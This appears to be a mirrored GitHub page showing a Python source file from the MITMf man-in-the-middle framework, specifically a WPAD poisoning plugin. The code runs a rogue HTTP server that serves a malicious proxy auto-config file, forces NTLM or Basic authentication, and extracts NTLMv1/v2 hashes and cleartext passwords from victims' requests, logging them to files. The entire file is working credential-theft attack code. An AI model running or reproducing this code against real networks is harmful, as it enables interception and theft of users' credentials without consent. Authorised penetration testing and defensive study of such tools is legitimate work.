mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-10 15:23:41 -07:00
the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins
157 lines
No EOL
5.5 KiB
Python
157 lines
No EOL
5.5 KiB
Python
import socket
|
|
import threading
|
|
import logging
|
|
import re
|
|
|
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
|
from core.configwatcher import ConfigWatcher
|
|
from core.responder.common import *
|
|
from HTTPPackets import *
|
|
|
|
mitmf_logger = logging.getLogger("mitmf")
|
|
|
|
class WPADPoisoner():
|
|
|
|
def start(self, options):
|
|
|
|
global args; args = options
|
|
args.forceWpadAuth = False
|
|
args.basic = False
|
|
|
|
try:
|
|
mitmf_logger.debug("[WPADPoisoner] online")
|
|
server = ThreadingTCPServer(("0.0.0.0", 80), HTTP)
|
|
t = threading.Thread(name="HTTP", target=server.serve_forever)
|
|
t.setDaemon(True)
|
|
t.start()
|
|
except Exception, e:
|
|
mitmf_logger.error("[WPADPoisoner] Error starting on port {}: {}".format(80, e))
|
|
|
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
|
|
allow_reuse_address = 1
|
|
|
|
def server_bind(self):
|
|
TCPServer.server_bind(self)
|
|
|
|
#HTTP Server Class
|
|
class HTTP(BaseRequestHandler):
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
self.request.settimeout(1)
|
|
data = self.request.recv(8092)
|
|
buff = WpadCustom(data,self.client_address[0])
|
|
if buff and args.forceWpadAuth is False:
|
|
mitmf_logger.info("[WPADPoisoner] WPAD (no auth) file sent to: {}".format(self.client_address[0]))
|
|
self.request.send(buff)
|
|
else:
|
|
buffer0 = PacketSequence(data,self.client_address[0])
|
|
self.request.send(buffer0)
|
|
except Exception as e:
|
|
pass
|
|
|
|
#Parse NTLMv1/v2 hash.
|
|
def ParseHTTPHash(data,client):
|
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
|
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
|
NthashLen = struct.unpack('<H',data[20:22])[0]
|
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
|
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
if NthashLen == 24:
|
|
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
|
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
outfile = "./logs/responder/HTTP-NTLMv1-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
|
|
WriteData(outfile,WriteHash, User+"::"+Hostname)
|
|
mitmf_logger.info('[+]HTTP NTLMv1 hash captured from :%s'%(client))
|
|
mitmf_logger.info('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
|
|
mitmf_logger.info('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
|
mitmf_logger.info('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
|
|
|
|
if NthashLen > 24:
|
|
NthashLen = 64
|
|
DomainLen = struct.unpack('<H',data[28:30])[0]
|
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
|
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
|
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
|
outfile = "./logs/responder/HTTP-NTLMv2-Client-"+client+".txt"
|
|
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
|
|
WriteData(outfile,WriteHash, User+"::"+Domain)
|
|
mitmf_logger.info('[+]HTTP NTLMv2 hash captured from :%s'%(client))
|
|
mitmf_logger.info('[+]HTTP NTLMv2 User is : %s'%(User))
|
|
mitmf_logger.info('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
|
|
mitmf_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
|
|
mitmf_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
|
|
|
|
def WpadCustom(data,client):
|
|
WPAD_Script = ConfigWatcher.getInstance().getConfig()["Responder"]['WPADScript']
|
|
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
|
|
if Wpad:
|
|
buffer1 = WPADScript(Payload=WPAD_Script)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
else:
|
|
return False
|
|
|
|
# Function used to check if we answer with a Basic or NTLM auth.
|
|
def Basic_Ntlm(Basic):
|
|
if Basic == True:
|
|
return IIS_Basic_401_Ans()
|
|
else:
|
|
return IIS_Auth_401_Ans()
|
|
|
|
#Handle HTTP packet sequence.
|
|
def PacketSequence(data,client):
|
|
Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
|
BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
|
|
|
if Ntlm:
|
|
packetNtlm = b64decode(''.join(Ntlm))[8:9]
|
|
if packetNtlm == "\x01":
|
|
r = NTLM_Challenge(ServerChallenge=Challenge)
|
|
r.calculate()
|
|
t = IIS_NTLM_Challenge_Ans()
|
|
t.calculate(str(r))
|
|
buffer1 = str(t)
|
|
return buffer1
|
|
if packetNtlm == "\x03":
|
|
NTLM_Auth= b64decode(''.join(Ntlm))
|
|
ParseHTTPHash(NTLM_Auth,client)
|
|
if args.forceWpadAuth and WpadCustom(data,client):
|
|
mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client))
|
|
buffer1 = WpadCustom(data,client)
|
|
return buffer1
|
|
else:
|
|
buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
|
|
if BasicAuth:
|
|
outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt"
|
|
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
|
|
mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
|
|
if args.forceWpadAuth and WpadCustom(data,client):
|
|
mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client))
|
|
buffer1 = WpadCustom(data,client)
|
|
return buffer1
|
|
else:
|
|
buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
|
|
buffer1.calculate()
|
|
return str(buffer1)
|
|
|
|
else:
|
|
return str(Basic_Ntlm(args.basic))
|
|
|